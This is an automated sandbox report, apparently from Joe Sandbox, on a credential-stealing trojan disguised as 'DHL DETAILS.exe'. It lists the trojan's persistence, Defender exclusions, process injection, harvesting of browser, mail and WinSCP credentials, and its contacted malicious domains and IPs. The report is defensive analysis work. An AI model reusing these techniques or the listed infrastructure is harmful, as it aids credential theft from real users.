                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\DHL DETAILS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2800783288.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2800783288.0000000002F6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2800783288.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 45052, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: Yara matchFile source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2800783288.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 45052, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2800783288.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2800783288.0000000002F6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2800783288.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 45052, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts221
                Windows Management Instrumentation
                1
                Scripting
                1
                DLL Side-Loading
                211
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Scheduled Task/Job
                1
                DLL Side-Loading
                311
                Process Injection
                1
                Obfuscated Files or Information
                1
                Credentials in Registry
                34
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                1
                Timestomp
                Security Account Manager1
                Query Registry
                SMB/Windows Admin Shares1
                Email Collection
                11
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron11
                Registry Run Keys / Startup Folder
                11
                Registry Run Keys / Startup Folder
                1
                DLL Side-Loading
                NTDS331
                Security Software Discovery
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
                Masquerading
                LSA Secrets1
                Process Discovery
                SSHKeylogging24
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts261
                Virtualization/Sandbox Evasion
                Cached Domain Credentials261
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
                Process Injection
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Hidden Files and Directories
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1405882 Sample: DHL DETAILS.exe Startdate: 09/03/2024 Architecture: WINDOWS Score: 100 71 ktxcomay.com.vn 2->71 73 artemis-rat.com 2->73 75 8 other IPs or domains 2->75 83 Snort IDS alert for network traffic 2->83 85 Found malware configuration 2->85 87 Malicious sample detected (through community Yara rule) 2->87 89 19 other signatures 2->89 10 DHL DETAILS.exe 15 7 2->10         started        15 svchost.exe 2->15         started        17 svchost.exe 2->17         started        19 5 other processes 2->19 signatures3 process4 dnsIp5 77 187.216.144.170 UninetSAdeCVMX Mexico 10->77 79 74.103.66.15 UUNETUS United States 10->79 81 98 other IPs or domains 10->81 69 C:\Users\user\AppData\Roaming\svchost.exe, PE32+ 10->69 dropped 119 Creates multiple autostart registry keys 10->119 21 cmd.exe 1 10->21         started        23 cmd.exe 1 10->23         started        121 System process connects to network (likely due to code injection or exploit) 15->121 123 Writes to foreign memory regions 15->123 125 Adds a directory exclusion to Windows Defender 15->125 26 CasPol.exe 15->26         started        28 powershell.exe 15->28         started        34 2 other processes 15->34 127 Injects a PE file into a foreign processes 17->127 30 MSBuild.exe 17->30         started        32 powershell.exe 17->32         started        36 2 other processes 17->36 129 Multi AV Scanner detection for dropped file 19->129 131 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->131 133 Machine Learning detection for dropped file 19->133 38 5 other processes 19->38 file6 signatures7 process8 signatures9 40 svchost.exe 21->40         started        43 conhost.exe 21->43         started        45 timeout.exe 1 21->45         started        91 Uses schtasks.exe or at.exe to add and modify task schedules 23->91 47 conhost.exe 23->47         started        49 schtasks.exe 1 23->49         started        93 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 26->93 95 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 26->95 97 Tries to steal Mail credentials (via file / registry access) 26->97 99 Tries to harvest and steal browser information (history, passwords, etc) 26->99 51 conhost.exe 28->51         started        101 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->101 53 conhost.exe 32->53         started        process10 signatures11 103 System process connects to network (likely due to code injection or exploit) 40->103 105 Writes to foreign memory regions 40->105 107 Adds a directory exclusion to Windows Defender 40->107 109 2 other signatures 40->109 55 MSBuild.exe 40->55         started        59 powershell.exe 40->59         started        61 AddInProcess32.exe 40->61         started        63 2 other processes 40->63 process12 file13 67 C:\Users\user\AppData\Roaming\...\VHFSQv.exe, PE32 55->67 dropped 111 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 55->111 113 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 55->113 115 Tries to steal Mail credentials (via file / registry access) 55->115 117 2 other signatures 55->117 65 conhost.exe 59->65         started        signatures14 process15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                DHL DETAILS.exe53%ReversingLabsWin64.Trojan.Generic
                DHL DETAILS.exe35%VirustotalBrowse
                DHL DETAILS.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\svchost.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe0%ReversingLabs
                C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe0%VirustotalBrowse
                C:\Users\user\AppData\Roaming\svchost.exe53%ReversingLabsWin64.Trojan.Generic
                C:\Users\user\AppData\Roaming\svchost.exe35%VirustotalBrowse
                No Antivirus matches
                SourceDetectionScannerLabelLink
                ktxcomay.com.vn0%VirustotalBrowse
                artemis-rat.com2%VirustotalBrowse
                fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                repository.gij.edu.gh0%VirustotalBrowse
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                uu-wrong-check-537652193.us-east-1.elb.amazonaws.com
                52.54.249.241
                truefalse
                  high
                  ktxcomay.com.vn
                  222.255.238.159
                  truetrueunknown
                  artemis-rat.com
                  172.67.140.87
                  truetrueunknown
                  github.com
                  140.82.114.3
                  truefalse
                    high
                    repository.gij.edu.gh
                    102.223.20.217
                    truefalseunknown
                    fp2e7a.wpc.phicdn.net
                    192.229.211.108
                    truefalseunknown
                    terminal7.veeblehosting.com
                    185.56.136.50
                    truefalse
                      high
                      check.unblock-us.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://github.com/TheSpeedX/PROXY-List/blob/master/http.txtfalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://terminal7.veeblehosting.comMSBuild.exe, 00000010.00000002.2800783288.0000000002F48000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://g.live.com/odclientsettings/Prod/C:svchost.exe, 00000002.00000003.2102220606.000001E8EC3D3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.2.drfalse
                              high
                              https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000002.00000003.2102220606.000001E8EC360000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.2.drfalse
                                high
                                https://account.dyn.com/MSBuild.exe, 00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  93.171.243.253
                                  unknownCzech Republic
                                  8870OVDC-ASUAtrue
                                  8.210.80.191
                                  unknownSingapore
                                  45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                  212.110.188.202
                                  unknownUnited Kingdom
                                  35425BYTEMARK-ASGBfalse
                                  24.230.33.96
                                  unknownUnited States
                                  11232MIDCO-NETUStrue
                                  1.0.0.13
                                  unknownAustralia
                                  13335CLOUDFLARENETUSfalse
                                  43.128.107.251
                                  unknownJapan4249LILLY-ASUSfalse
                                  64.157.16.43
                                  unknownUnited States
                                  3064AFFINITY-FTLUSfalse
                                  50.169.37.50
                                  unknownUnited States
                                  7922COMCAST-7922USfalse
                                  158.69.197.113
                                  unknownCanada
                                  16276OVHFRfalse
                                  103.216.51.36
                                  unknownCambodia
                                  135375TCC-AS-APTodayCommunicationCoLtdKHtrue
                                  51.15.139.15
                                  unknownFrance
                                  12876OnlineSASFRtrue
                                  66.70.235.23
                                  unknownCanada
                                  16276OVHFRfalse
                                  89.168.121.175
                                  unknownUnited Kingdom
                                  9105TISCALI-UKTalkTalkCommunicationsLimitedGBfalse
                                  45.227.193.166
                                  unknownBrazil
                                  28146MHNETTELECOMBRfalse
                                  181.78.11.218
                                  unknownArgentina
                                  52468UFINETPANAMASAPAfalse
                                  139.224.64.191
                                  unknownChina
                                  37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                  13.234.24.116
                                  unknownUnited States
                                  16509AMAZON-02UStrue
                                  202.154.178.243
                                  unknownIndonesia
                                  9341ICONPLN-ID-AP-ISPPTINDONESIACOMNETSPLUSIDtrue
                                  31.43.63.70
                                  unknownUkraine
                                  50581UTGUAtrue
                                  103.4.118.130
                                  unknownBangladesh
                                  38203ADNTELECOMLTD-BDADNTelecomLtdBDfalse
                                  103.74.229.133
                                  unknownBangladesh
                                  131340TAQWAIT-AS-APMdMozammelHoquetaTaqwaITBDfalse
                                  36.95.13.18
                                  unknownIndonesia
                                  7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                                  52.35.240.119
                                  unknownUnited States
                                  16509AMAZON-02USfalse
                                  200.116.198.222
                                  unknownColombia
                                  13489EPMTelecomunicacionesSAESPCOfalse
                                  103.25.210.102
                                  unknownIndonesia
                                  132653B-LINK-AS-IDPTTransdataSejahteraIDtrue
                                  177.136.182.110
                                  unknownBrazil
                                  263595ALBInternetInformaticaLtda-MEBRtrue
                                  221.194.149.8
                                  unknownChina
                                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                  101.51.121.29
                                  unknownThailand
                                  23969TOT-NETTOTPublicCompanyLimitedTHtrue
                                  146.19.106.42
                                  unknownFrance
                                  7726FITC-ASUSfalse
                                  46.17.63.166
                                  unknownUnited Kingdom
                                  39326HSO-GROUPGBtrue
                                  114.129.2.82
                                  unknownJapan7671MCNETNTTSmartConnectCorporationJPfalse
                                  62.171.131.101
                                  unknownUnited Kingdom
                                  51167CONTABODEtrue
                                  116.90.229.186
                                  unknownNepal
                                  24550WEBSURFERNP-AS-NPWebsurferNepalInternetServiceProviderfalse
                                  183.164.254.8
                                  unknownChina
                                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                  103.47.93.248
                                  unknownIndia
                                  9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                  201.163.73.93
                                  unknownMexico
                                  11172AlestraSdeRLdeCVMXfalse
                                  103.47.93.246
                                  unknownIndia
                                  9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                  202.162.105.202
                                  unknownSingapore
                                  64050BCPL-SGBGPNETGlobalASNSGtrue
                                  118.172.47.97
                                  unknownThailand
                                  23969TOT-NETTOTPublicCompanyLimitedTHfalse
                                  67.205.177.122
                                  unknownUnited States
                                  14061DIGITALOCEAN-ASNUSfalse
                                  89.249.253.10
                                  unknownRussian Federation
                                  31370MOSLINE-ASRUfalse
                                  212.110.188.220
                                  unknownUnited Kingdom
                                  35425BYTEMARK-ASGBfalse
                                  110.235.250.155
                                  unknownCambodia
                                  23673ONLINE-ASCogetelOnlineCambodiaISPKHfalse
                                  109.123.254.43
                                  unknownCzech Republic
                                  15685CASABLANCA-ASInternetCollocationProviderCZfalse
                                  187.216.144.170
                                  unknownMexico
                                  8151UninetSAdeCVMXtrue
                                  172.67.200.220
                                  unknownUnited States
                                  13335CLOUDFLARENETUStrue
                                  13.59.156.167
                                  unknownUnited States
                                  16509AMAZON-02UStrue
                                  74.103.66.15
                                  unknownUnited States
                                  701UUNETUStrue
                                  93.94.90.189
                                  unknownItaly
                                  41327FIBERTELECOM-ASFiberTelecomSpAITtrue
                                  103.47.93.244
                                  unknownIndia
                                  9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                  212.110.188.216
                                  unknownUnited Kingdom
                                  35425BYTEMARK-ASGBfalse
                                  51.77.222.4
                                  unknownFrance
                                  16276OVHFRfalse
                                  92.86.92.126
                                  unknownRomania
                                  9050RTDBucharestRomaniaROfalse
                                  3.142.239.244
                                  unknownUnited States
                                  16509AMAZON-02USfalse
                                  212.110.188.211
                                  unknownUnited Kingdom
                                  35425BYTEMARK-ASGBfalse
                                  212.110.188.213
                                  unknownUnited Kingdom
                                  35425BYTEMARK-ASGBfalse
                                  183.215.23.242
                                  unknownChina
                                  56047CMNET-HUNAN-APChinaMobilecommunicationscorporationCNfalse
                                  35.207.123.94
                                  unknownUnited States
                                  19527GOOGLE-2USfalse
                                  162.144.32.209
                                  unknownUnited States
                                  46606UNIFIEDLAYER-AS-1USfalse
                                  96.80.235.1
                                  unknownUnited States
                                  7922COMCAST-7922UStrue
                                  80.235.108.14
                                  unknownEstonia
                                  3249ESTPAKEEfalse
                                  144.126.217.189
                                  unknownUnited States
                                  36413LOYOLAUSfalse
                                  112.250.211.161
                                  unknownChina
                                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                  45.190.170.254
                                  unknownunknown
                                  269901MARAVECATELECOMUNICACIONESCAVEtrue
                                  158.220.91.230
                                  unknownSwitzerland
                                  8556LEVANTISCHfalse
                                  148.251.3.169
                                  unknownGermany
                                  24940HETZNER-ASDEfalse
                                  158.220.91.231
                                  unknownSwitzerland
                                  8556LEVANTISCHfalse
                                  148.72.23.56
                                  unknownUnited States
                                  26496AS-26496-GO-DADDY-COM-LLCUStrue
                                  103.99.27.26
                                  unknownunknown
                                  136920GARDAMORLDA-AS-APGardamorLdaTLtrue
                                  188.163.170.130
                                  unknownUkraine
                                  15895KSNET-ASUAtrue
                                  81.250.223.126
                                  unknownFrance
                                  3215FranceTelecom-OrangeFRfalse
                                  103.148.216.121
                                  unknownunknown
                                  140226LITTLEBOYSNET-AS-APLittleBoysNetBDfalse
                                  218.252.244.126
                                  unknownHong Kong
                                  9908HKCABLE2-HK-APHKCableTVLtdHKfalse
                                  212.110.188.204
                                  unknownUnited Kingdom
                                  35425BYTEMARK-ASGBfalse
                                  191.101.1.116
                                  unknownChile
                                  61317ASDETUKhttpwwwheficedcomGBfalse
                                  94.131.14.66
                                  unknownUkraine
                                  29632NASSIST-ASGItrue
                                  186.126.71.44
                                  unknownArgentina
                                  7303TelecomArgentinaSAARfalse
                                  109.252.244.170
                                  unknownRussian Federation
                                  25513ASN-MGTS-USPDRUfalse
                                  103.47.93.231
                                  unknownIndia
                                  9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINfalse
                                  212.110.188.207
                                  unknownUnited Kingdom
                                  35425BYTEMARK-ASGBfalse
                                  103.47.93.223
                                  unknownIndia
                                  9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                  177.93.76.26
                                  unknownBrazil
                                  263163JRLINKPROVEDORDEINTERNETVIARARIOLTDABRtrue
                                  51.15.139.59
                                  unknownFrance
                                  12876OnlineSASFRfalse
                                  45.235.16.121
                                  unknownBrazil
                                  267406AGOBrasilInternetLtdaBRfalse
                                  104.17.9.114
                                  unknownUnited States
                                  13335CLOUDFLARENETUStrue
                                  121.129.47.25
                                  unknownKorea Republic of
                                  4766KIXS-AS-KRKoreaTelecomKRfalse
                                  138.0.228.120
                                  unknownHonduras
                                  263725MULTICABLEDEHONDURASHNtrue
                                  213.168.250.121
                                  unknownEuropean Union
                                  63949LINODE-APLinodeLLCUSfalse
                                  20.33.5.27
                                  unknownUnited States
                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                  200.174.198.95
                                  unknownBrazil
                                  4230CLAROSABRfalse
                                  189.106.62.102
                                  unknownBrazil
                                  7738TelemarNorteLesteSABRfalse
                                  120.33.126.200
                                  unknownChina
                                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                  103.164.214.122
                                  unknownunknown
                                  7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                  180.104.0.161
                                  unknownChina
                                  137702CHINATELECOM-JIANGSU-NANJING-IDCNanjingJiangsuProvincefalse
                                  155.50.250.163
                                  unknownUnited States
                                  5647ASN-KODAKUSfalse
                                  172.67.181.9
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  104.236.0.129
                                  unknownUnited States
                                  14061DIGITALOCEAN-ASNUStrue
                                  192.169.249.16
                                  unknownUnited States
                                  26496AS-26496-GO-DADDY-COM-LLCUStrue
                                  54.67.125.45
                                  unknownUnited States
                                  16509AMAZON-02USfalse
                                  185.236.203.208
                                  unknownRomania
                                  9009M247GBfalse
                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1405882
                                  Start date and time:2024-03-09 13:13:11 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 11m 10s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:42
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:DHL DETAILS.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@61/28@7/100
                                  EGA Information:
                                  • Successful, ratio: 33.3%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 78
                                  • Number of non-executed functions: 8
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                  • Excluded IPs from analysis (whitelisted): 23.220.73.166, 23.220.73.168, 23.206.6.29, 20.114.59.183, 192.229.211.108, 20.166.126.56, 20.190.190.131, 20.190.190.129, 20.190.190.196, 40.126.62.132, 20.190.190.194, 40.126.62.130, 40.126.62.131, 20.190.190.132, 20.189.173.20
                                  • Excluded domains from analysis (whitelisted): crl.edge.digicert.com, slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, crl3.digicert.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                  • Execution Graph export aborted for target VHFSQv.exe, PID 80676 because it is empty
                                  • Execution Graph export aborted for target VHFSQv.exe, PID 82112 because it is empty
                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing network information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtCreateFile calls found.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                  TimeTypeDescription
                                  13:14:07API Interceptor496x Sleep call for process: svchost.exe modified
                                  13:14:10API Interceptor72x Sleep call for process: DHL DETAILS.exe modified
                                  13:14:21Task SchedulerRun new task: svchost path: "C:\Users\user\AppData\Roaming\svchost.exe"
                                  13:14:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
                                  13:14:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\Users\user\AppData\Roaming\svchost.exe"
                                  13:14:41API Interceptor79x Sleep call for process: powershell.exe modified
                                  13:14:44API Interceptor48x Sleep call for process: MSBuild.exe modified
                                  13:14:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VHFSQv C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe
                                  13:14:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run VHFSQv C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe
                                  13:15:41API Interceptor22x Sleep call for process: CasPol.exe modified
                                  13:16:35API Interceptor1x Sleep call for process: WerFault.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  93.171.243.253https://waltondev2.com/c.phpGet hashmaliciousPhisherBrowse
